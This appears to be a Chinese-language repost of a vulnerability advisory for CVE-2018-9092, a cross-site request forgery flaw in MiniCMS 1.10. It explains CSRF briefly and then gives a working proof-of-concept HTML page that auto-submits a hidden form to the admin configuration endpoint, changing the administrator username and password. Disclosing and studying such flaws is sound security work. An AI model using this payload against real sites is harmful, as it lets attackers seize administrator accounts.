当前位置: 首页 > 工具软件 > MiniCMS > 使用案例 >

(CVE-2018-9092)MiniCMS 1.10存在CSRF漏洞可增加管理员账户

仇飞鹏
2023-12-01

漏洞简介

上报日期:
2018-03-30
版本:
1.10
漏洞概述:
MiniCMS是一个在github上开源的CMS系统,跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。

POC实现代码

CSRF测试页面代码如下:

<html>
 <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
 <title>test</title>
 <body>
 <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
 <input type="hidden" name="site_name" value="hack123" />  
 <input type="hidden" name="site_desc" value="hacktest" />  
 <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
 <input type="hidden" name="user_nick" value="hack" />  
 <input type="hidden" name="user_name" value="admin" />  
 <input type="hidden" name="user_pass" value="hackpass" />  
 <input type="hidden" name="comment_code" value="" />  
 <input type="hidden" name="save" value=" " /> 
 </form>
 <script>
  document.forms[0].submit();
 </script>
 </body>
 </head>
 </html>

MiniCMS 1.10存在CSRF漏洞,当管理员登陆后访问上面CSRF测试页面可增加管理员账户。

 类似资料: